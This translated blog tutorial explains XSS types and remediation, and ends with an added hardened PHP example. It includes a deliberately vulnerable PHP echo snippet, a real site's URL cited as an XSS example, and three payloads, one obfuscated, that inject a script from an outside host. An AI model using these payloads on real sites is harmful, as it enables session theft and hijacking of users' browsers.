XSS Vulnerability Analysis

Source: Internet
Author: User


  • What is XSS


    • Cross-site scripting is abbreviated as XSS so that it is not confused with Cascading Style Sheets (CSS). A malicious attacker inserts HTML code into a web page; when a user browses the page, the HTML code embedded in it is executed, achieving the attacker's purpose of attacking the user.

  • What XSS can do


    • Stealing administrator cookies or user cookies

    • XSS Worm

    • Planting malicious code (watering hole attack)

    • Limited Keylogger

  • XSS classification


    • Reflected XSS

    • Stored XSS

    • DOM XSS

    • Flash XSS

    • mXSS

  • Reflected (non-persistent) XSS


    • When the request is made, the XSS code appears in the URL and is submitted to the server as input. The server processes it and returns a response whose content contains the XSS code, and finally the browser parses and executes it.

    • This process is like a reflection, which is why it is called reflected XSS.

    xss.php:
    <?php echo $_GET['x']; ?>
    # Submit: /xss.php?x=<script>alert(1)</script>

    • The server parses the request and echo writes <script>alert(1)</script> intact into the response body; the browser then parses and executes it, triggering the pop-up window.

  • Stored (persistent) XSS


      • The difference between stored XSS and reflected XSS is that the submitted XSS code is stored on the server (in a database, memory, the file system, etc.), so the next request for the target page does not need to submit the XSS code again.

      • The most typical example is message board XSS: a user submits a message containing XSS code, which is stored in the database. When a target user views the message board, those messages are queried from the database and displayed; the browser encounters the XSS code, parses and executes it as normal HTML and JS, and the XSS attack is triggered.

      • Stored XSS attacks are the most covert

#eg: http://www.nfpeople.com/user.php?id=21839
  • How XSS is used

      • Payload (valid attack code)

    <script src='http://b.ioio.pub/xss/probe.js'></script>
    <svg onload=s=createElement('script');body.appendChild(s);s.src='http://b.ioio.pub/xss/probe.js>
    <svg onload=eval(String.fromCharCode(115,61,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,115,46,115,114,99,61,39,104,116,116,112,58,47,47,98,46,105,111,105,111,46,112,117,98,47,120,115,115,47,112,114,111,98,101,46,106,115))>
  • Remediation

      • Defending against XSS requires strict filtering of user input, tailored to the actual situation. Filter-based XSS defenses generally fall into two types: blacklist-based filtering and whitelist-based filtering. The latter is usually more effective, because any input outside the whitelist can simply be ignored. When building the whitelist, make sure the user experience is not affected while eliminating as much unnecessary input as possible.
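
The reflected case in xss.php combined with the whitelist approach described above, as an added example (not the original author's code): the x parameter is accepted only if it matches an allowlist pattern, and the value is also HTML-encoded on output as a second layer, a step the filtering text above does not mention. The pattern, the function names and the file name xss_fixed.php are assumptions made for illustration.

```php
<?php
// Added example: hardened counterpart of the page's xss.php (file name xss_fixed.php is assumed).
declare(strict_types=1);

// Assumed allowlist policy: letters, digits, space and a few punctuation marks, 1 to 64 chars.
const X_ALLOWLIST = '/\A[\p{L}\p{N} _.,-]{1,64}\z/u';

/** Return the value if it matches the allowlist, otherwise null (the input is ignored). */
function allowlisted(?string $value): ?string
{
    // preg_match returns false on invalid UTF-8 under /u, which is rejected here as well.
    if ($value === null || preg_match(X_ALLOWLIST, $value) !== 1) {
        return null;
    }
    return $value;
}

/** Encode a value for an HTML text or quoted-attribute context. */
function html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Build the response body for a raw ?x= value. */
function render(?string $raw): string
{
    $x = allowlisted($raw);
    if ($x === null) {
        return '<p>Invalid input.</p>';
    }
    // Encoding is still applied, so a later loosening of the allowlist does not reopen the hole.
    return '<p>x = ' . html($x) . '</p>';
}

if (PHP_SAPI === 'cli') {
    // Constructed sample inputs; run offline with: php xss_fixed.php
    $samples = ['hello world', '<script>alert(1)</script>', '<svg onload=alert(1)>', null];
    foreach ($samples as $s) {
        echo var_export($s, true), ' => ', render($s), PHP_EOL;
    }
    // Effect of output encoding alone on the page's test payload:
    echo html('<script>alert(1)</script>'), PHP_EOL;
} else {
    header('Content-Type: text/html; charset=UTF-8');
    $raw = $_GET['x'] ?? null;
    echo render(is_string($raw) ? $raw : null); // ?x[]=... arrives as an array
}
```

The same html() call belongs wherever stored values such as message board entries are written back into a page, since the stored case executes at output time.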


This article is from the "Creative Pilgrim" blog; please keep this source attribution: http://dearch.blog.51cto.com/10423918/1826827
